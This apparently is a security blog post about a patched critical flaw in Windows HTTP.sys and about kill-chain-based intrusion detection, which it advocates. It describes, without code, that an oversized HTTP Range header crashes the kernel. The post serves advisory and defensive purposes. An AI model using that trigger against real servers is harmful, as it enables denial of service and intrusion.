Just last week Microsoft patched a critical vulnerablity that effects the Windows HTTP stack. which if exploited by an attacker by sending a specially crafted HTTP request, could give the adversary an ability to execute arbitrary code in the context of the System account.
For those who aren’t aware already, the HTTP listener in Microsoft IIS, is implemented as a kernel-mode device driver called the HTTP protocol stack (HTTP.sys). IIS uses HTTP.sys for the following tasks:
- Routing HTTP requests to the correct request queue.
- Caching of responses in kernel mode.
- Performing all text-based logging for the WWW service.
- Implementing Quality of Service (QoS) functionality, which includes connection limits, connection timeouts, queue-length limits, and bandwidth throttling.
The problem here stems from HTTP.sys not safely handling the Range header in a HTTP request. The Range header parameter is used to fetch part of a file from a server, which is sometimes handy for resuming downloads. If you set the range way too large, it causes the Windows kernel to crash.
I found these two articles quite useful, while researching this vulnerability.
Two exploits have been discovered to be in the wild as of this post: one to test if a server is vulnerable, and one that crashes it. Mattias Geniar of hosting solutions provider Nucleus claims to have tracked down one of these exploit code and he covers it good detail here.
Microsoft has released a patch as part of their last Patch Tuesday advisory.
The vulnerability has been assigned a reference and is further described here.
Detecting zero day attacks
Software and Hardware are bound to have bugs in them, because they are written by Human Beings! The best way to detect exploits of these bugs/vulnerabilities is to have a holistic approach to setting up an intrusion detection solution. One of the effective frameworks for thinking about cyber defense is called the Cyber Kill Chain, originally created by Lockheed Martin. This is a very interesting framework and I shall be talking in more detail about it in a later post. But briefly, as per this framework, every attack has a set of stages or sequence of steps, that an adversary performs, to accomplish his/her mission.
As per the framework, vulnerabilities are only a part of the whole attack sequence, called here the Exploitation Stage. So by having detection mechanisms that are tuned to detect anomalies at different stages of cyber attack, we get the capability of breaking the sequence even before and post-exploitation stages, thus increasing the possibilities of detecting zero day attacks.
To quote from the Lockheed Martin paper:
Using a kill chain model to describe phases of intrusions, mapping adversary kill chain indicators to defender courses of action, identifying patterns that link individual intrusions into broader campaigns, and understanding the iterative nature of intelligence gathering form the basis of intelligence-driven computer network defense (CND). Institutionalization of this approach reduces the likelihood of adversary success, informs network defense investment and resource prioritization, and yields relevant metrics of performance and effectiveness. The evolution of advanced persistent threats necessitates an intelligence-based model because in this model the defenders mitigate not just vulnerability, but the threat component of risk, too.
Hence, I believe that in order to succeed in the race with the cybersecurity adversaries, who use zero day exploits and vulnerabilities to accomplish their missions, Enterprises must evolve from using signature/discrete event based detection, to a holistic approach of using the Cyber Kill Chain based intrusion detection framework.
This is a very interesting topic, and I will be talking more about it in my forthcoming posts on this blog.
Title Image Courtesy: slashgear.com